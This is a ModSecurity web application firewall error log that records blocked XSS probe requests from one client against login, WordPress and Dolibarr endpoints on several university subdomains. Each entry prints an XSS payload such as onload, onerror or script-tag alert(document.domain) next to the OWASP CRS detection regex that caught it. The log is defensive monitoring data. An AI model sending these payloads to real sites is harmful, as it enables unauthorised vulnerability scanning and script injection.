[Tue Aug 29 11:56:01.645452 2023] [:error] [pid 2706] [client 143.42.78.27] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?i)([\\\\s\\"'`;\\\\/0-9\\\\=]+on\\\\w+\\\\s*=)" at ARGS:username. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_41_xss_attacks.conf"] [line "21"] [id "973337"] [rev "1"] [msg "XSS Filter - Category 2: Event Handler Vector"] [data "Matched Data: /onload= found within ARGS:username: test\\x22><svg/onload=alert(document.domain)>"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "1"] [accuracy "8"] [tag "OWASP_CRS/WEB_ATTACK/XSS"] [tag "WASCTC/WASC-8"] [tag "WASCTC/WASC-22"] [tag "OWASP_TOP_10/A2"] [tag "OWASP_AppSensor/IE1"] [tag "PCI/6.5.1"] [hostname "informatika.unla.ac.id"] [uri "/goform/login_process"] [unique_id "ZO16YcCo-f0AAAqSw4gAAAAN"]
[Tue Aug 29 11:56:01.648757 2023] [:error] [pid 2651] [client 143.42.78.27] ModSecurity: Access denied with code 403 (phase 2). Pattern match "([\\\\~\\\\!\\\\@\\\\#\\\\$\\\\%\\\\^\\\\&\\\\*\\\\(\\\\)\\\\-\\\\+\\\\=\\\\{\\\\}\\\\[\\\\]\\\\|\\\\:\\\\;\\"\\\\'\\\\\\xc2\\xb4\\\\\\xe2\\x80\\x99\\\\\\xe2\\x80\\x98\\\\`\\\\<\\\\>].*?){4,}" at ARGS:username. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_41_sql_injection_attacks.conf"] [line "159"] [id "981173"] [rev "2"] [msg "Restricted SQL Character Anomaly Detection Alert - Total # of special characters exceeded"] [data "Matched Data: = found within ARGS:username: test\\x22><svg/onload=alert(document.domain)>"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "8"] [tag "OWASP_CRS/WEB_ATTACK/SQL_INJECTION"] [hostname "journal.unla.ac.id"] [uri "/goform/login_process"] [unique_id "ZO16YcCo-f0AAApbUtYAAAAh"]
[Tue Aug 29 11:56:01.654941 2023] [:error] [pid 2650] [client 143.42.78.27] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?i:(?:union\\\\s*?(?:all|distinct|[(!@]*?)?\\\\s*?[([]*?\\\\s*?select\\\\s+)|(?:\\\\w+\\\\s+like\\\\s+[\\"'`\\xc2\\xb4\\xe2\\x80\\x99\\xe2\\x80\\x98])|(?:like\\\\s*?[\\"'`\\xc2\\xb4\\xe2\\x80\\x99\\xe2\\x80\\x98]\\\\%)|(?:[\\"'`\\xc2\\xb4\\xe2\\x80\\x99\\xe2\\x80\\x98]\\\\s*?like\\\\W*?[\\"'`\\xc2\\xb4 ..." at ARGS:username. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_41_sql_injection_attacks.conf"] [line "223"] [id "981245"] [msg "Detects basic SQL authentication bypass attempts 2/3"] [data "Matched Data: \\x22><svg/o found within ARGS:username: test\\x22><svg/onload=alert(document.domain)>"] [severity "CRITICAL"] [tag "OWASP_CRS/WEB_ATTACK/SQL_INJECTION"] [hostname "ft.unla.ac.id"] [uri "/goform/login_process"] [unique_id "ZO16YcCo-f0AAApa-RMAAAAg"]
[Tue Aug 29 11:56:01.655737 2023] [:error] [pid 2707] [client 143.42.78.27] ModSecurity: Access denied with code 403 (phase 2). Pattern match "\\\\W{4,}" at ARGS:hostname. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "37"] [id "960024"] [rev "2"] [msg "Meta-Character Anomaly Detection Alert - Repetative Non-Word Characters"] [data "Matched Data: \\x22)</ found within ARGS:hostname: \\x22)</script><script>alert(document.domain);</script>"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "8"] [hostname "journal.unla.ac.id"] [uri "/cgi-bin/login.cgi"] [unique_id "ZO16YcCo-f0AAAqTv1wAAAAa"]
[Tue Aug 29 11:56:01.664130 2023] [:error] [pid 2718] [client 143.42.78.27] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(^[\\"'`\\xc2\\xb4\\xe2\\x80\\x99\\xe2\\x80\\x98;]+|[\\"'`\\xc2\\xb4\\xe2\\x80\\x99\\xe2\\x80\\x98;]+$)" at ARGS:wlcms[_login_custom_js]. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_41_sql_injection_attacks.conf"] [line "64"] [id "981318"] [rev "2"] [msg "SQL Injection Attack: Common Injection Testing Detected"] [data "Matched Data: ; found within ARGS:wlcms[_login_custom_js]: alert(/XSS/);"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "8"] [tag "OWASP_CRS/WEB_ATTACK/SQL_INJECTION"] [tag "WASCTC/WASC-19"] [tag "OWASP_TOP_10/A1"] [tag "OWASP_AppSensor/CIE1"] [tag "PCI/6.5.2"] [hostname "journal.unla.ac.id"] [uri "/wp-login.php"] [unique_id "ZO16YcCo-f0AAAqeFgkAAAAx"]
[Tue Aug 29 11:56:02.541094 2023] [:error] [pid 2718] [client 143.42.78.27] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?i:([\\\\s'\\"`\\xc2\\xb4\\xe2\\x80\\x99\\xe2\\x80\\x98\\\\(\\\\)]*?)\\\\b([\\\\d\\\\w]++)([\\\\s'\\"`\\xc2\\xb4\\xe2\\x80\\x99\\xe2\\x80\\x98\\\\(\\\\)]*?)(?:(?:=|<=>|r?like|sounds\\\\s+like|regexp)([\\\\s'\\"`\\xc2\\xb4\\xe2\\x80\\x99\\xe2\\x80\\x98\\\\(\\\\)]*?)\\\\2\\\\b|(?:!=|<=|>=|<>|<|>|\\\\^|is\\\\s+not ..." at ARGS:foruserlogin. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_41_sql_injection_attacks.conf"] [line "77"] [id "950901"] [rev "2"] [msg "SQL Injection Attack: SQL Tautology Detected."] [data "Matched Data: script>alert found within ARGS:foruserlogin: </script><script>alert(document.domain)</script>"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "8"] [tag "OWASP_CRS/WEB_ATTACK/SQL_INJECTION"] [tag "WASCTC/WASC-19"] [tag "OWASP_TOP_10/A1"] [tag "OWASP_AppSensor/CIE1"] [tag "PCI/6.5.2"] [hostname "unla.ac.id"] [uri "/dolibarr/adherents/cartes/carte.php"] [unique_id "ZO16YsCo-f0AAAqeFgsAAAAx"]
[Tue Aug 29 11:56:02.569110 2023] [:error] [pid 2712] [client 143.42.78.27] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?i)([\\\\s\\"'`;\\\\/0-9\\\\=]+on\\\\w+\\\\s*=)" at ARGS:username. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_41_xss_attacks.conf"] [line "21"] [id "973337"] [rev "1"] [msg "XSS Filter - Category 2: Event Handler Vector"] [data "Matched Data: /onload= found within ARGS:username: test\\x22><svg/onload=alert(document.domain)>"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "1"] [accuracy "8"] [tag "OWASP_CRS/WEB_ATTACK/XSS"] [tag "WASCTC/WASC-8"] [tag "WASCTC/WASC-22"] [tag "OWASP_TOP_10/A2"] [tag "OWASP_AppSensor/IE1"] [tag "PCI/6.5.1"] [hostname "www.unla.ac.id"] [uri "/goform/login_process"] [unique_id "ZO16YsCo-f0AAAqY6OoAAAAr"]
[Tue Aug 29 11:56:02.627757 2023] [:error] [pid 2753] [client 143.42.78.27] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?i:([\\\\s'\\"`\\xc2\\xb4\\xe2\\x80\\x99\\xe2\\x80\\x98\\\\(\\\\)]*?)\\\\b([\\\\d\\\\w]++)([\\\\s'\\"`\\xc2\\xb4\\xe2\\x80\\x99\\xe2\\x80\\x98\\\\(\\\\)]*?)(?:(?:=|<=>|r?like|sounds\\\\s+like|regexp)([\\\\s'\\"`\\xc2\\xb4\\xe2\\x80\\x99\\xe2\\x80\\x98\\\\(\\\\)]*?)\\\\2\\\\b|(?:!=|<=|>=|<>|<|>|\\\\^|is\\\\s+not ..." at ARGS:foruserlogin. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_41_sql_injection_attacks.conf"] [line "77"] [id "950901"] [rev "2"] [msg "SQL Injection Attack: SQL Tautology Detected."] [data "Matched Data: script>alert found within ARGS:foruserlogin: </script><script>alert(document.domain)</script>"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "8"] [tag "OWASP_CRS/WEB_ATTACK/SQL_INJECTION"] [tag "WASCTC/WASC-19"] [tag "OWASP_TOP_10/A1"] [tag "OWASP_AppSensor/CIE1"] [tag "PCI/6.5.2"] [hostname "journal.unla.ac.id"] [uri "/dolibarr/adherents/cartes/carte.php"] [unique_id "ZO16YsCo-f0AAArB1uoAAAAV"]
[Tue Aug 29 11:56:02.647324 2023] [:error] [pid 2754] [client 143.42.78.27] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?i:([\\\\s'\\"`\\xc2\\xb4\\xe2\\x80\\x99\\xe2\\x80\\x98\\\\(\\\\)]*?)\\\\b([\\\\d\\\\w]++)([\\\\s'\\"`\\xc2\\xb4\\xe2\\x80\\x99\\xe2\\x80\\x98\\\\(\\\\)]*?)(?:(?:=|<=>|r?like|sounds\\\\s+like|regexp)([\\\\s'\\"`\\xc2\\xb4\\xe2\\x80\\x99\\xe2\\x80\\x98\\\\(\\\\)]*?)\\\\2\\\\b|(?:!=|<=|>=|<>|<|>|\\\\^|is\\\\s+not ..." at ARGS:foruserlogin. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_41_sql_injection_attacks.conf"] [line "77"] [id "950901"] [rev "2"] [msg "SQL Injection Attack: SQL Tautology Detected."] [data "Matched Data: script>alert found within ARGS:foruserlogin: </script><script>alert(document.domain)</script>"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "8"] [tag "OWASP_CRS/WEB_ATTACK/SQL_INJECTION"] [tag "WASCTC/WASC-19"] [tag "OWASP_TOP_10/A1"] [tag "OWASP_AppSensor/CIE1"] [tag "PCI/6.5.2"] [hostname "pusatbahasa.unla.ac.id"] [uri "/dolibarr/adherents/cartes/carte.php"] [unique_id "ZO16YsCo-f0AAArC7dYAAAAW"]
[Tue Aug 29 11:56:02.649272 2023] [:error] [pid 2712] [client 143.42.78.27] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?i:([\\\\s'\\"`\\xc2\\xb4\\xe2\\x80\\x99\\xe2\\x80\\x98\\\\(\\\\)]*?)\\\\b([\\\\d\\\\w]++)([\\\\s'\\"`\\xc2\\xb4\\xe2\\x80\\x99\\xe2\\x80\\x98\\\\(\\\\)]*?)(?:(?:=|<=>|r?like|sounds\\\\s+like|regexp)([\\\\s'\\"`\\xc2\\xb4\\xe2\\x80\\x99\\xe2\\x80\\x98\\\\(\\\\)]*?)\\\\2\\\\b|(?:!=|<=|>=|<>|<|>|\\\\^|is\\\\s+not ..." at ARGS:foruserlogin. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_41_sql_injection_attacks.conf"] [line "77"] [id "950901"] [rev "2"] [msg "SQL Injection Attack: SQL Tautology Detected."] [data "Matched Data: script>alert found within ARGS:foruserlogin: </script><script>alert(document.domain)</script>"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "8"] [tag "OWASP_CRS/WEB_ATTACK/SQL_INJECTION"] [tag "WASCTC/WASC-19"] [tag "OWASP_TOP_10/A1"] [tag "OWASP_AppSensor/CIE1"] [tag "PCI/6.5.2"] [hostname "informatika.unla.ac.id"] [uri "/dolibarr/adherents/cartes/carte.php"] [unique_id "ZO16YsCo-f0AAAqY6O0AAAAr"]
[Tue Aug 29 11:56:02.654796 2023] [:error] [pid 2718] [client 143.42.78.27] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?i:([\\\\s'\\"`\\xc2\\xb4\\xe2\\x80\\x99\\xe2\\x80\\x98\\\\(\\\\)]*?)\\\\b([\\\\d\\\\w]++)([\\\\s'\\"`\\xc2\\xb4\\xe2\\x80\\x99\\xe2\\x80\\x98\\\\(\\\\)]*?)(?:(?:=|<=>|r?like|sounds\\\\s+like|regexp)([\\\\s'\\"`\\xc2\\xb4\\xe2\\x80\\x99\\xe2\\x80\\x98\\\\(\\\\)]*?)\\\\2\\\\b|(?:!=|<=|>=|<>|<|>|\\\\^|is\\\\s+not ..." at ARGS:foruserlogin. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_41_sql_injection_attacks.conf"] [line "77"] [id "950901"] [rev "2"] [msg "SQL Injection Attack: SQL Tautology Detected."] [data "Matched Data: script>alert found within ARGS:foruserlogin: </script><script>alert(document.domain)</script>"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "8"] [tag "OWASP_CRS/WEB_ATTACK/SQL_INJECTION"] [tag "WASCTC/WASC-19"] [tag "OWASP_TOP_10/A1"] [tag "OWASP_AppSensor/CIE1"] [tag "PCI/6.5.2"] [hostname "ft.unla.ac.id"] [uri "/dolibarr/adherents/cartes/carte.php"] [unique_id "ZO16YsCo-f0AAAqeFgwAAAAx"]
[Tue Aug 29 11:56:02.696122 2023] [:error] [pid 2745] [client 143.42.78.27] ModSecurity: Access denied with code 403 (phase 2). Pattern match "\\\\W{4,}" at ARGS:keyword_search. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "37"] [id "960024"] [rev "2"] [msg "Meta-Character Anomaly Detection Alert - Repetative Non-Word Characters"] [data "Matched Data: --!>\\x22  found within ARGS:keyword_search: --!>\\x22 autofocus onfocus=alert(/2Ue0IXhHNjNl9QMpplilzBsRqJA/);//"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "8"] [hostname "informatika.unla.ac.id"] [uri "/properties/"] [unique_id "ZO16YsCo-f0AAAq5@K4AAAAK"]
[Tue Aug 29 11:56:02.697318 2023] [:error] [pid 2706] [client 143.42.78.27] ModSecurity: Access denied with code 403 (phase 2). Pattern match "\\\\W{4,}" at ARGS:keyword_search. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "37"] [id "960024"] [rev "2"] [msg "Meta-Character Anomaly Detection Alert - Repetative Non-Word Characters"] [data "Matched Data: --!>\\x22  found within ARGS:keyword_search: --!>\\x22 autofocus onfocus=alert(/2Ue0IXhHNjNl9QMpplilzBsRqJA/);//"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "8"] [hostname "journal.unla.ac.id"] [uri "/properties/"] [unique_id "ZO16YsCo-f0AAAqSw48AAAAN"]
[Tue Aug 29 11:56:02.699528 2023] [:error] [pid 2718] [client 143.42.78.27] ModSecurity: Access denied with code 403 (phase 2). Pattern match "\\\\W{4,}" at ARGS:keyword_search. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "37"] [id "960024"] [rev "2"] [msg "Meta-Character Anomaly Detection Alert - Repetative Non-Word Characters"] [data "Matched Data: --!>\\x22  found within ARGS:keyword_search: --!>\\x22 autofocus onfocus=alert(/2Ue0IXhHNjNl9QMpplilzBsRqJA/);//"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "8"] [hostname "ft.unla.ac.id"] [uri "/properties/"] [unique_id "ZO16YsCo-f0AAAqeFg4AAAAx"]
[Tue Aug 29 11:56:02.718180 2023] [:error] [pid 2706] [client 143.42.78.27] ModSecurity: Access denied with code 403 (phase 2). Pattern match "\\\\W{4,}" at ARGS:keyword_search. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "37"] [id "960024"] [rev "2"] [msg "Meta-Character Anomaly Detection Alert - Repetative Non-Word Characters"] [data "Matched Data: --!>\\x22  found within ARGS:keyword_search: --!>\\x22 autofocus onfocus=alert(/2Ue0IXhHNjNl9QMpplilzBsRqJA/);//"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "8"] [hostname "unla.ac.id"] [uri "/properties/"] [unique_id "ZO16YsCo-f0AAAqSw5AAAAAN"]
[Tue Aug 29 11:56:02.790770 2023] [:error] [pid 2712] [client 143.42.78.27] ModSecurity: Access denied with code 403 (phase 2). Pattern match "\\\\W{4,}" at ARGS:keyword_search. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "37"] [id "960024"] [rev "2"] [msg "Meta-Character Anomaly Detection Alert - Repetative Non-Word Characters"] [data "Matched Data: --!>\\x22  found within ARGS:keyword_search: --!>\\x22 autofocus onfocus=alert(/2Ue0IXhHNjNl9QMpplilzBsRqJA/);//"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "8"] [hostname "pusatbahasa.unla.ac.id"] [uri "/properties/"] [unique_id "ZO16YsCo-f0AAAqY6PQAAAAr"]
[Tue Aug 29 11:56:02.803876 2023] [:error] [pid 2718] [client 143.42.78.27] ModSecurity: Access denied with code 403 (phase 2). Pattern match "\\\\W{4,}" at ARGS:hostname. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "37"] [id "960024"] [rev "2"] [msg "Meta-Character Anomaly Detection Alert - Repetative Non-Word Characters"] [data "Matched Data: \\x22)</ found within ARGS:hostname: \\x22)</script><script>alert(document.domain);</script>"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "8"] [hostname "www.unla.ac.id"] [uri "/cgi-bin/login.cgi"] [unique_id "ZO16YsCo-f0AAAqeFhIAAAAx"]
[Tue Aug 29 11:56:03.541730 2023] [:error] [pid 2650] [client 143.42.78.27] ModSecurity: Access denied with code 403 (phase 2). Pattern match "\\\\W{4,}" at ARGS:cat_id. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "37"] [id "960024"] [rev "2"] [msg "Meta-Character Anomaly Detection Alert - Repetative Non-Word Characters"] [data "Matched Data: \\x22></ found within ARGS:cat_id: 6\\x22></script><script>alert(document.domain)</script>"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "8"] [hostname "unla.ac.id"] [uri "/"] [unique_id "ZO16Y8Co-f0AAApa-RsAAAAg"]
[Tue Aug 29 11:56:03.559831 2023] [:error] [pid 2718] [client 143.42.78.27] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?i:([\\\\s'\\"`\\xc2\\xb4\\xe2\\x80\\x99\\xe2\\x80\\x98\\\\(\\\\)]*?)\\\\b([\\\\d\\\\w]++)([\\\\s'\\"`\\xc2\\xb4\\xe2\\x80\\x99\\xe2\\x80\\x98\\\\(\\\\)]*?)(?:(?:=|<=>|r?like|sounds\\\\s+like|regexp)([\\\\s'\\"`\\xc2\\xb4\\xe2\\x80\\x99\\xe2\\x80\\x98\\\\(\\\\)]*?)\\\\2\\\\b|(?:!=|<=|>=|<>|<|>|\\\\^|is\\\\s+not ..." at ARGS:foruserlogin. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_41_sql_injection_attacks.conf"] [line "77"] [id "950901"] [rev "2"] [msg "SQL Injection Attack: SQL Tautology Detected."] [data "Matched Data: script>alert found within ARGS:foruserlogin: </script><script>alert(document.domain)</script>"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "8"] [tag "OWASP_CRS/WEB_ATTACK/SQL_INJECTION"] [tag "WASCTC/WASC-19"] [tag "OWASP_TOP_10/A1"] [tag "OWASP_AppSensor/CIE1"] [tag "PCI/6.5.2"] [hostname "www.unla.ac.id"] [uri "/dolibarr/adherents/cartes/carte.php"] [unique_id "ZO16Y8Co-f0AAAqeFhQAAAAx"]
[Tue Aug 29 11:56:03.561403 2023] [:error] [pid 2750] [client 143.42.78.27] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?i)([\\\\s\\"'`;\\\\/0-9\\\\=]+on\\\\w+\\\\s*=)" at ARGS:urls[]. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_41_xss_attacks.conf"] [line "21"] [id "973337"] [rev "1"] [msg "XSS Filter - Category 2: Event Handler Vector"] [data "Matched Data:  onerror= found within ARGS:urls[]: <img src=x onerror=alert(document.domain)>"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "1"] [accuracy "8"] [tag "OWASP_CRS/WEB_ATTACK/XSS"] [tag "WASCTC/WASC-8"] [tag "WASCTC/WASC-22"] [tag "OWASP_TOP_10/A2"] [tag "OWASP_AppSensor/IE1"] [tag "PCI/6.5.1"] [hostname "informatika.unla.ac.id"] [uri "/wp-admin/admin-ajax.php"] [unique_id "ZO16Y8Co-f0AAAq@sd4AAAAM"]
[Tue Aug 29 11:56:03.566621 2023] [:error] [pid 2753] [client 143.42.78.27] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?i)([\\\\s\\"'`;\\\\/0-9\\\\=]+on\\\\w+\\\\s*=)" at ARGS:urls[]. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_41_xss_attacks.conf"] [line "21"] [id "973337"] [rev "1"] [msg "XSS Filter - Category 2: Event Handler Vector"] [data "Matched Data:  onerror= found within ARGS:urls[]: <img src=x onerror=alert(document.domain)>"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "1"] [accuracy "8"] [tag "OWASP_CRS/WEB_ATTACK/XSS"] [tag "WASCTC/WASC-8"] [tag "WASCTC/WASC-22"] [tag "OWASP_TOP_10/A2"] [tag "OWASP_AppSensor/IE1"] [tag "PCI/6.5.1"] [hostname "ft.unla.ac.id"] [uri "/wp-admin/admin-ajax.php"] [unique_id "ZO16Y8Co-f0AAArB1u4AAAAV"]
[Tue Aug 29 11:56:03.568219 2023] [:error] [pid 2650] [client 143.42.78.27] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(^[\\"'`\\xc2\\xb4\\xe2\\x80\\x99\\xe2\\x80\\x98;]+|[\\"'`\\xc2\\xb4\\xe2\\x80\\x99\\xe2\\x80\\x98;]+$)" at ARGS:sortBy. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_41_sql_injection_attacks.conf"] [line "64"] [id "981318"] [rev "2"] [msg "SQL Injection Attack: Common Injection Testing Detected"] [data "Matched Data: \\x22 found within ARGS:sortBy: \\x22><script>alert(document.domain)</script>"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "8"] [tag "OWASP_CRS/WEB_ATTACK/SQL_INJECTION"] [tag "WASCTC/WASC-19"] [tag "OWASP_TOP_10/A1"] [tag "OWASP_AppSensor/CIE1"] [tag "PCI/6.5.2"] [hostname "unla.ac.id"] [uri "/ajax.php"] [unique_id "ZO16Y8Co-f0AAApa-RwAAAAg"]
[Tue Aug 29 11:56:03.608741 2023] [:error] [pid 2651] [client 143.42.78.27] ModSecurity: Access denied with code 403 (phase 2). Pattern match "([\\\\~\\\\!\\\\@\\\\#\\\\$\\\\%\\\\^\\\\&\\\\*\\\\(\\\\)\\\\-\\\\+\\\\=\\\\{\\\\}\\\\[\\\\]\\\\|\\\\:\\\\;\\"\\\\'\\\\\\xc2\\xb4\\\\\\xe2\\x80\\x99\\\\\\xe2\\x80\\x98\\\\`\\\\<\\\\>].*?){4,}" at ARGS:urls[]. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_41_sql_injection_attacks.conf"] [line "159"] [id "981173"] [rev "2"] [msg "Restricted SQL Character Anomaly Detection Alert - Total # of special characters exceeded"] [data "Matched Data: ( found within ARGS:urls[]: <img src=x onerror=alert(document.domain)>"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "8"] [tag "OWASP_CRS/WEB_ATTACK/SQL_INJECTION"] [hostname "journal.unla.ac.id"] [uri "/wp-admin/admin-ajax.php"] [unique_id "ZO16Y8Co-f0AAApbUt0AAAAh"]
[Tue Aug 29 11:56:03.618652 2023] [:error] [pid 2753] [client 143.42.78.27] ModSecurity: Access denied with code 403 (phase 2). Pattern match "\\\\W{4,}" at ARGS:keyword_search. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "37"] [id "960024"] [rev "2"] [msg "Meta-Character Anomaly Detection Alert - Repetative Non-Word Characters"] [data "Matched Data: --!>\\x22  found within ARGS:keyword_search: --!>\\x22 autofocus onfocus=alert(/2Ue0IXhHNjNl9QMpplilzBsRqJA/);//"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "8"] [hostname "www.unla.ac.id"] [uri "/properties/"] [unique_id "ZO16Y8Co-f0AAArB1u8AAAAV"]
[Tue Aug 29 11:56:03.629359 2023] [:error] [pid 2718] [client 143.42.78.27] ModSecurity: Access denied with code 403 (phase 2). Pattern match "\\\\W{4,}" at ARGS:cat_id. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "37"] [id "960024"] [rev "2"] [msg "Meta-Character Anomaly Detection Alert - Repetative Non-Word Characters"] [data "Matched Data: \\x22></ found within ARGS:cat_id: 6\\x22></script><script>alert(document.domain)</script>"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "8"] [hostname "informatika.unla.ac.id"] [uri "/"] [unique_id "ZO16Y8Co-f0AAAqeFhYAAAAx"]
[Tue Aug 29 11:56:03.630221 2023] [:error] [pid 2754] [client 143.42.78.27] ModSecurity: Access denied with code 403 (phase 2). Pattern match "\\\\W{4,}" at ARGS:cat_id. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "37"] [id "960024"] [rev "2"] [msg "Meta-Character Anomaly Detection Alert - Repetative Non-Word Characters"] [data "Matched Data: \\x22></ found within ARGS:cat_id: 6\\x22></script><script>alert(document.domain)</script>"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "8"] [hostname "journal.unla.ac.id"] [uri "/"] [unique_id "ZO16Y8Co-f0AAArC7eEAAAAW"]
[Tue Aug 29 11:56:03.676887 2023] [:error] [pid 2745] [client 143.42.78.27] ModSecurity: Access denied with code 403 (phase 2). Pattern match "\\\\W{4,}" at ARGS:cat_id. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "37"] [id "960024"] [rev "2"] [msg "Meta-Character Anomaly Detection Alert - Repetative Non-Word Characters"] [data "Matched Data: \\x22></ found within ARGS:cat_id: 6\\x22></script><script>alert(document.domain)</script>"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "8"] [hostname "pusatbahasa.unla.ac.id"] [uri "/"] [unique_id "ZO16Y8Co-f0AAAq5@LYAAAAK"]
[Tue Aug 29 11:56:03.731450 2023] [:error] [pid 2754] [client 143.42.78.27] ModSecurity: Access denied with code 403 (phase 2). Pattern match "\\\\W{4,}" at ARGS:cat_id. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "37"] [id "960024"] [rev "2"] [msg "Meta-Character Anomaly Detection Alert - Repetative Non-Word Characters"] [data "Matched Data: \\x22></ found within ARGS:cat_id: 6\\x22></script><script>alert(document.domain)</script>"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "8"] [hostname "ft.unla.ac.id"] [uri "/"] [unique_id "ZO16Y8Co-f0AAArC7eIAAAAW"]
[Tue Aug 29 11:56:03.733731 2023] [:error] [pid 2753] [client 143.42.78.27] ModSecurity: Access denied with code 403 (phase 2). Pattern match "([\\\\~\\\\!\\\\@\\\\#\\\\$\\\\%\\\\^\\\\&\\\\*\\\\(\\\\)\\\\-\\\\+\\\\=\\\\{\\\\}\\\\[\\\\]\\\\|\\\\:\\\\;\\"\\\\'\\\\\\xc2\\xb4\\\\\\xe2\\x80\\x99\\\\\\xe2\\x80\\x98\\\\`\\\\<\\\\>].*?){4,}" at ARGS:urls[]. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_41_sql_injection_attacks.conf"] [line "159"] [id "981173"] [rev "2"] [msg "Restricted SQL Character Anomaly Detection Alert - Total # of special characters exceeded"] [data "Matched Data: ( found within ARGS:urls[]: <img src=x onerror=alert(document.domain)>"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "8"] [tag "OWASP_CRS/WEB_ATTACK/SQL_INJECTION"] [hostname "pusatbahasa.unla.ac.id"] [uri "/wp-admin/admin-ajax.php"] [unique_id "ZO16Y8Co-f0AAArB1vEAAAAV"]
[Tue Aug 29 11:56:03.756641 2023] [:error] [pid 2753] [client 143.42.78.27] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?i)([\\\\s\\"'`;\\\\/0-9\\\\=]+on\\\\w+\\\\s*=)" at ARGS:urls[]. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_41_xss_attacks.conf"] [line "21"] [id "973337"] [rev "1"] [msg "XSS Filter - Category 2: Event Handler Vector"] [data "Matched Data:  onerror= found within ARGS:urls[]: <img src=x onerror=alert(document.domain)>"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "1"] [accuracy "8"] [tag "OWASP_CRS/WEB_ATTACK/XSS"] [tag "WASCTC/WASC-8"] [tag "WASCTC/WASC-22"] [tag "OWASP_TOP_10/A2"] [tag "OWASP_AppSensor/IE1"] [tag "PCI/6.5.1"] [hostname "unla.ac.id"] [uri "/wp-admin/admin-ajax.php"] [unique_id "ZO16Y8Co-f0AAArB1vIAAAAV"]
